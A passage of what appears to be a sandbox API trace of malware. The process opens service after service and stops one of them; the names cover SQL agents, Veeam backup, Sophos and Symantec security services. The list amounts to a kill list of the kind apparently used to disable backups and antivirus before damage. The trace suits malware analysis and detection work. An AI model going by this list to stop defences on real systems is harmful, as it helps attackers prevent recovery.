(hSCManager=0x6835400, lpServiceName="OracleXETNSListener", dwDesiredAccess=0x2c) returned 0x0 [0101.189] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.189] GetTickCount () returned 0x115bc28 [0101.189] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.189] OpenServiceW (hSCManager=0x6835360, lpServiceName="PDVFSService", dwDesiredAccess=0x2c) returned 0x0 [0101.190] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.190] GetTickCount () returned 0x115bc28 [0101.190] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.190] OpenServiceW (hSCManager=0x6835428, lpServiceName="POP3Svc", dwDesiredAccess=0x2c) returned 0x0 [0101.190] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.191] GetTickCount () returned 0x115bc28 [0101.191] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.191] OpenServiceW (hSCManager=0x6835270, lpServiceName="RESvc", dwDesiredAccess=0x2c) returned 0x0 [0101.191] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.191] GetTickCount () returned 0x115bc28 [0101.191] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.192] OpenServiceW (hSCManager=0x6835478, lpServiceName="ReportServer", dwDesiredAccess=0x2c) returned 0x0 [0101.192] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.192] GetTickCount () returned 0x115bc28 [0101.192] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.193] OpenServiceW (hSCManager=0x6835270, lpServiceName="ReportServer$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0101.193] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.193] GetTickCount () returned 0x115bc28 [0101.193] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.193] OpenServiceW (hSCManager=0x68353d8, lpServiceName="ReportServer$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0101.193] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.194] GetTickCount () returned 0x115bc28 [0101.194] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.194] OpenServiceW (hSCManager=0x68353b0, lpServiceName="ReportServer$TPS", dwDesiredAccess=0x2c) returned 0x0 [0101.194] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.194] GetTickCount () returned 0x115bc28 [0101.194] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.195] OpenServiceW (hSCManager=0x68353b0, lpServiceName="ReportServer$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0101.195] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.195] GetTickCount () returned 0x115bc28 [0101.195] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835298 [0101.195] OpenServiceW (hSCManager=0x6835298, lpServiceName="SAVAdminService", dwDesiredAccess=0x2c) returned 0x0 [0101.196] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.196] GetTickCount () returned 0x115bc28 [0101.196] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.196] OpenServiceW (hSCManager=0x6835220, lpServiceName="SAVService", dwDesiredAccess=0x2c) returned 0x0 [0101.196] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.197] GetTickCount () returned 0x115bc28 [0101.197] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.197] OpenServiceW (hSCManager=0x6835270, lpServiceName="SDRSVC", dwDesiredAccess=0x2c) returned 0x6835478 [0101.203] QueryServiceStatusEx (in: hService=0x6835478, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0101.205] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.206] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.206] GetTickCount () returned 0x115bc38 [0101.206] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.206] OpenServiceW (hSCManager=0x68352c0, lpServiceName="SMTPSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.206] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.207] GetTickCount () returned 0x115bc38 [0101.207] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.207] OpenServiceW (hSCManager=0x6835478, lpServiceName="SNAC", dwDesiredAccess=0x2c) returned 0x0 [0101.207] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.207] GetTickCount () returned 0x115bc38 [0101.207] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.208] OpenServiceW (hSCManager=0x6835270, lpServiceName="SQL Backups", dwDesiredAccess=0x2c) returned 0x0 [0101.208] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.208] GetTickCount () returned 0x115bc38 [0101.208] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.208] OpenServiceW (hSCManager=0x68353b0, lpServiceName="SQLAgent$BKUPEXEC", dwDesiredAccess=0x2c) returned 0x0 [0101.209] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.209] GetTickCount () returned 0x115bc38 [0101.209] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.209] OpenServiceW (hSCManager=0x68353b0, lpServiceName="SQLAgent$CITRIX_METAFRAME", dwDesiredAccess=0x2c) returned 0x0 [0101.209] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.209] GetTickCount () returned 0x115bc38 [0101.209] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.210] OpenServiceW (hSCManager=0x6835360, lpServiceName="SQLAgent$CXDB", dwDesiredAccess=0x2c) returned 0x0 [0101.210] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.210] GetTickCount () returned 0x115bc38 [0101.210] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.211] OpenServiceW (hSCManager=0x68353b0, lpServiceName="SQLAgent$ECWDB2", dwDesiredAccess=0x2c) returned 0x0 [0101.211] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.211] GetTickCount () returned 0x115bc38 [0101.211] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.211] OpenServiceW (hSCManager=0x68353b0, lpServiceName="SQLAgent$PRACTTICEBGC", dwDesiredAccess=0x2c) returned 0x0 [0101.211] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.212] GetTickCount () returned 0x115bc38 [0101.212] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835298 [0101.212] OpenServiceW (hSCManager=0x6835298, lpServiceName="SQLAgent$PRACTTICEMGT", dwDesiredAccess=0x2c) returned 0x0 [0101.212] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.212] GetTickCount () returned 0x115bc38 [0101.212] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.213] OpenServiceW (hSCManager=0x6835478, lpServiceName="SQLAgent$PROD", dwDesiredAccess=0x2c) returned 0x0 [0101.213] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.213] GetTickCount () returned 0x115bc38 [0101.213] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.213] OpenServiceW (hSCManager=0x6835248, lpServiceName="SQLAgent$PROFXENGAGEMENT", dwDesiredAccess=0x2c) returned 0x0 [0101.214] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.216] GetTickCount () returned 0x115bc47 [0101.217] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68354a0 [0101.229] OpenServiceW (hSCManager=0x68354a0, lpServiceName="SQLAgent$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0101.229] CloseServiceHandle (hSCObject=0x68354a0) returned 1 [0101.230] GetTickCount () returned 0x115bc47 [0101.230] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.230] OpenServiceW (hSCManager=0x68352e8, lpServiceName="SQLAgent$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0101.230] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.241] GetTickCount () returned 0x115bc57 [0101.241] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.241] OpenServiceW (hSCManager=0x68353b0, lpServiceName="SQLAgent$SOPHOS", dwDesiredAccess=0x2c) returned 0x0 [0101.241] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.241] GetTickCount () returned 0x115bc57 [0101.241] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.242] OpenServiceW (hSCManager=0x6835338, lpServiceName="SQLAgent$SQLEXPRESS", dwDesiredAccess=0x2c) returned 0x0 [0101.242] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.242] GetTickCount () returned 0x115bc57 [0101.242] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.243] OpenServiceW (hSCManager=0x6835428, lpServiceName="SQLAgent$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0101.243] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.243] GetTickCount () returned 0x115bc57 [0101.243] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.243] OpenServiceW (hSCManager=0x6835338, lpServiceName="SQLAgent$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0101.244] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.244] GetTickCount () returned 0x115bc57 [0101.244] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835388 [0101.244] OpenServiceW (hSCManager=0x6835388, lpServiceName="SQLAgent$TPS", dwDesiredAccess=0x2c) returned 0x0 [0101.244] CloseServiceHandle (hSCObject=0x6835388) returned 1 [0101.245] GetTickCount () returned 0x115bc57 [0101.245] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.245] OpenServiceW (hSCManager=0x6835270, lpServiceName="SQLAgent$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0101.245] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.245] GetTickCount () returned 0x115bc57 [0101.245] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.246] OpenServiceW (hSCManager=0x68352c0, lpServiceName="SQLAgent$VEEAMSQL2008R2", dwDesiredAccess=0x2c) returned 0x0 [0101.246] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.246] GetTickCount () returned 0x115bc57 [0101.246] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.247] OpenServiceW (hSCManager=0x6835338, lpServiceName="SQLAgent$VEEAMSQL2012", dwDesiredAccess=0x2c) returned 0x0 [0101.247] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.247] GetTickCount () returned 0x115bc67 [0101.247] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.248] OpenServiceW (hSCManager=0x6835270, lpServiceName="SQLBrowser", dwDesiredAccess=0x2c) returned 0x0 [0101.248] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.248] GetTickCount () returned 0x115bc67 [0101.248] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835388 [0101.249] OpenServiceW (hSCManager=0x6835388, lpServiceName="SQLSERVERAGENT", dwDesiredAccess=0x2c) returned 0x0 [0101.249] CloseServiceHandle (hSCObject=0x6835388) returned 1 [0101.249] GetTickCount () returned 0x115bc67 [0101.249] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.249] OpenServiceW (hSCManager=0x6835248, lpServiceName="SQLSafeOLRService", dwDesiredAccess=0x2c) returned 0x0 [0101.249] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.250] GetTickCount () returned 0x115bc67 [0101.250] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.250] OpenServiceW (hSCManager=0x6835428, lpServiceName="SQLTELEMETRY", dwDesiredAccess=0x2c) returned 0x0 [0101.250] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.250] GetTickCount () returned 0x115bc67 [0101.250] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.251] OpenServiceW (hSCManager=0x6835478, lpServiceName="SQLTELEMETRY$ECWDB2", dwDesiredAccess=0x2c) returned 0x0 [0101.251] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.251] GetTickCount () returned 0x115bc67 [0101.251] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68351f8 [0101.252] OpenServiceW (hSCManager=0x68351f8, lpServiceName="SQLWriter", dwDesiredAccess=0x2c) returned 0x0 [0101.252] CloseServiceHandle (hSCObject=0x68351f8) returned 1 [0101.257] GetTickCount () returned 0x115bc67 [0101.257] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.257] OpenServiceW (hSCManager=0x6835338, lpServiceName="SQLsafe Backup Service", dwDesiredAccess=0x2c) returned 0x0 [0101.258] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.258] GetTickCount () returned 0x115bc67 [0101.258] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835298 [0101.258] OpenServiceW (hSCManager=0x6835298, lpServiceName="SQLsafe Filter Service", dwDesiredAccess=0x2c) returned 0x0 [0101.258] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.259] GetTickCount () returned 0x115bc67 [0101.259] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.259] OpenServiceW (hSCManager=0x6835478, lpServiceName="SamSs", dwDesiredAccess=0x2c) returned 0x6835220 [0101.259] QueryServiceStatusEx (in: hService=0x6835220, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0101.259] ControlService (in: hService=0x6835220, dwControl=0x1, lpServiceStatus=0x95fa94 | out: lpServiceStatus=0x95fa94*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0101.260] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.260] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.260] GetTickCount () returned 0x115bc67 [0101.260] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.260] OpenServiceW (hSCManager=0x68353b0, lpServiceName="SepMasterService", dwDesiredAccess=0x2c) returned 0x0 [0101.261] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.261] GetTickCount () returned 0x115bc67 [0101.261] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.261] OpenServiceW (hSCManager=0x6835360, lpServiceName="ShMonitor", dwDesiredAccess=0x2c) returned 0x0 [0101.261] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.262] GetTickCount () returned 0x115bc76 [0101.262] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.262] OpenServiceW (hSCManager=0x68353d8, lpServiceName="SmcService", dwDesiredAccess=0x2c) returned 0x0 [0101.262] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.263] GetTickCount () returned 0x115bc76 [0101.263] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835388 [0101.263] OpenServiceW (hSCManager=0x6835388, lpServiceName="Smcinst", dwDesiredAccess=0x2c) returned 0x0 [0101.263] CloseServiceHandle (hSCObject=0x6835388) returned 1 [0101.263] GetTickCount () returned 0x115bc76 [0101.263] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.264] OpenServiceW (hSCManager=0x6835270, lpServiceName="SntpService", dwDesiredAccess=0x2c) returned 0x0 [0101.264] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.264] GetTickCount () returned 0x115bc76 [0101.264] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.264] OpenServiceW (hSCManager=0x6835338, lpServiceName="Sophos Agent", dwDesiredAccess=0x2c) returned 0x0 [0101.265] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.265] GetTickCount () returned 0x115bc76 [0101.265] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.265] OpenServiceW (hSCManager=0x6835428, lpServiceName="Sophos AutoUpdate Service", dwDesiredAccess=0x2c) returned 0x0 [0101.265] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.265] GetTickCount () returned 0x115bc76 [0101.265] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.266] OpenServiceW (hSCManager=0x6835478, lpServiceName="Sophos Clean Service", dwDesiredAccess=0x2c) returned 0x0 [0101.266] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.266] GetTickCount () returned 0x115bc76 [0101.266] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.267] OpenServiceW (hSCManager=0x6835220, lpServiceName="Sophos Device Control Service", dwDesiredAccess=0x2c) returned 0x0 [0101.267] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.267] GetTickCount () returned 0x115bc76 [0101.267] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.267] OpenServiceW (hSCManager=0x6835360, lpServiceName="Sophos File Scanner Service", dwDesiredAccess=0x2c) returned 0x0 [0101.267] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.268] GetTickCount () returned 0x115bc76 [0101.268] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.268] OpenServiceW (hSCManager=0x68352e8, lpServiceName="Sophos Health Service", dwDesiredAccess=0x2c) returned 0x0 [0101.268] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.268] GetTickCount () returned 0x115bc76 [0101.268] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.269] OpenServiceW (hSCManager=0x68353b0, lpServiceName="Sophos MCS Agent", dwDesiredAccess=0x2c) returned 0x0 [0101.269] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.269] GetTickCount () returned 0x115bc76 [0101.269] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68354a0 [0101.278] OpenServiceW (hSCManager=0x68354a0, lpServiceName="Sophos MCS Client", dwDesiredAccess=0x2c) returned 0x0 [0101.280] CloseServiceHandle (hSCObject=0x68354a0) returned 1 [0101.280] GetTickCount () returned 0x115bc86 [0101.280] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.281] OpenServiceW (hSCManager=0x6835220, lpServiceName="Sophos Message Router", dwDesiredAccess=0x2c) returned 0x0 [0101.281] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.281] GetTickCount () returned 0x115bc86 [0101.281] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.281] OpenServiceW (hSCManager=0x6835428, lpServiceName="Sophos Safestore Service", dwDesiredAccess=0x2c) returned 0x0 [0101.281] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.282] GetTickCount () returned 0x115bc86 [0101.282] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.282] OpenServiceW (hSCManager=0x6835338, lpServiceName="Sophos System Protection Service", dwDesiredAccess=0x2c) returned 0x0 [0101.282] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.282] GetTickCount () returned 0x115bc86 [0101.282] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.283] OpenServiceW (hSCManager=0x6835360, lpServiceName="Sophos Web Control Service", dwDesiredAccess=0x2c) returned 0x0 [0101.283] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.283] GetTickCount () returned 0x115bc86 [0101.283] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.283] OpenServiceW (hSCManager=0x68353b0, lpServiceName="SstpSvc", dwDesiredAccess=0x2c) returned 0x6835298 [0101.284] QueryServiceStatusEx (in: hService=0x6835298, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0101.284] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.284] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.284] GetTickCount () returned 0x115bc86 [0101.284] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.285] OpenServiceW (hSCManager=0x6835478, lpServiceName="Symantec System Recovery", dwDesiredAccess=0x2c) returned 0x0 [0101.285] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.285] GetTickCount () returned 0x115bc86 [0101.285] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.285] OpenServiceW (hSCManager=0x6835220, lpServiceName="TmCCSF", dwDesiredAccess=0x2c) returned 0x0 [0101.286] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.286] GetTickCount () returned 0x115bc86 [0101.286] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.286] OpenServiceW (hSCManager=0x6835248, lpServiceName="TrueKey", dwDesiredAccess=0x2c) returned 0x0 [0101.286] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.286] GetTickCount () returned 0x115bc86 [0101.286] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68351f8 [0101.287] OpenServiceW (hSCManager=0x68351f8, lpServiceName="TrueKeyScheduler", dwDesiredAccess=0x2c) returned 0x0 [0101.287] CloseServiceHandle (hSCObject=0x68351f8) returned 1 [0101.287] GetTickCount () returned 0x115bc86 [0101.287] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.288] OpenServiceW (hSCManager=0x68352e8, lpServiceName="TrueKeyServiceHelper", dwDesiredAccess=0x2c) returned 0x0 [0101.288] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.288] GetTickCount () returned 0x115bc86 [0101.288] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.289] OpenServiceW (hSCManager=0x6835360, lpServiceName="UI0Detect", dwDesiredAccess=0x2c) returned 0x6835478 [0101.290] QueryServiceStatusEx (in: hService=0x6835478, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0101.290] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.290] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.290] GetTickCount () returned 0x115bc86 [0101.290] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.291] OpenServiceW (hSCManager=0x6835478, lpServiceName="Veeam Backup Catalog Data Service", dwDesiredAccess=0x2c) returned 0x0 [0101.291] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.291] GetTickCount () returned 0x115bc86 [0101.291] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.291] OpenServiceW (hSCManager=0x6835478, lpServiceName="VeeamBackupSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.291] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.292] GetTickCount () returned 0x115bc86 [0101.292] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.292] OpenServiceW (hSCManager=0x6835338, lpServiceName="VeeamBrokerSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.292] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.292] GetTickCount () returned 0x115bc86 [0101.292] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.296] OpenServiceW (hSCManager=0x6835478, lpServiceName="VeeamCatalogSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.296] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.297] GetTickCount () returned 0x115bc96 [0101.297] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.297] OpenServiceW (hSCManager=0x68353d8, lpServiceName="VeeamCloudSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.297] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.297] GetTickCount () returned 0x115bc96 [0101.297] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.298] OpenServiceW (hSCManager=0x6835220, lpServiceName="VeeamDeploySvc", dwDesiredAccess=0x2c) returned 0x0 [0101.298] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.298] GetTickCount () returned 0x115bc96 [0101.298] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.298] OpenServiceW (hSCManager=0x6835360, lpServiceName="VeeamDeploymentService", dwDesiredAccess=0x2c) returned 0x0 [0101.299] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.299] GetTickCount () returned 0x115bc96 [0101.299] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68354a0 [0101.299] OpenServiceW (hSCManager=0x68354a0, lpServiceName="VeeamEnterpriseManagerSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.299] CloseServiceHandle (hSCObject=0x68354a0) returned 1 [0101.300] GetTickCount () returned 0x115bc96 [0101.300] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68351f8 [0101.300] OpenServiceW (hSCManager=0x68351f8, lpServiceName="VeeamHvIntegrationSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.300] CloseServiceHandle (hSCObject=0x68351f8) returned 1 [0101.300] GetTickCount () returned 0x115bc96 [0101.300] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.301] OpenServiceW (hSCManager=0x6835338, lpServiceName="VeeamMountSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.301] CloseServiceHandle (hSCObject=0x6835338) returned 